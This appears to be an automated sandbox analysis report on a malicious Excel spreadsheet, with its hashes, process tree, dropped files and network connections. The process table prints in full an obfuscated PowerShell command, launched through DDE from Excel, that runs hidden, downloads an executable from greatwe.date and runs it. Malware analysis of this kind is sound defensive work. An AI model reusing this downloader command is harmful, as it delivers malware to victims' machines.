File name: | d0013b66a66c4035f337023fb12d6fe79e567225267b442f8a744a02c8caddca.xls |
Full analysis: | https://app.any.run/tasks/53d9e58e-c2c9-4b00-bf3e-bc67f03e6891 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 02:53:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/CDFV2 |
File info: | Composite Document File V2 Document, Cannot read short stream |
MD5: | BE84253E519772C0594ABB52A1B6F0B2 |
SHA1: | 5E1DF020AB5DD5B4EA14A6067737193B95F51981 |
SHA256: | D0013B66A66C4035F337023FB12D6FE79E567225267B442F8A744A02C8CADDCA |
SSDEEP: | 1536:8+WxEtjPOtioVjDGUU1qfDlaGGx+cLYIxreo8fHzIOz/smD:8+WxEtjPOtioVjDGUU1qfDlaGGx+cLYd |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1896 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1296 | cmd /c"pOWeRshELl -nopRoFi -WIn hiDDEN -NOLo -noNInTeRA -eXeCUTIoNp bYpass "$7d0mK6 = [TypE](\"{1}{0}{3}{2}\" -f 'on','EnVIr','Nt','ME') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDeRpaTh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLOadFiLE.iNVoKE(\"https://greatwe.date/pagino\",\"$Des\334784.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\334784.exe" | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | pOWeRshELl -nopRoFi -WIn hiDDEN -NOLo -noNInTeRA -eXeCUTIoNp bYpass "$7d0mK6 = [TypE](\"{1}{0}{3}{2}\" -f 'on','EnVIr','Nt','ME') ; do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} = $7d0mk6::gETfoLDeRpaTh(\"Desktop\");(&(\"{0}{1}{2}\" -f'Ne','w-','Object') (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m.Ne','ent','t.Web','Cli')).dowNLOadFiLE.iNVoKE(\"https://greatwe.date/pagino\",\"$Des\334784.exe\")}while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\334784.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1896 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B9D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PWGXIH2RTNGRJ1OFL0MV.temp | — | |
MD5:— | SHA256:— | |||
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
2760 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9820.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2760 | powershell.exe | 89.18.27.183:443 | greatwe.date | Optic Bridge SRL | RO | suspicious |
Domain | IP | Reputation |
---|---|---|
greatwe.date |
| malicious |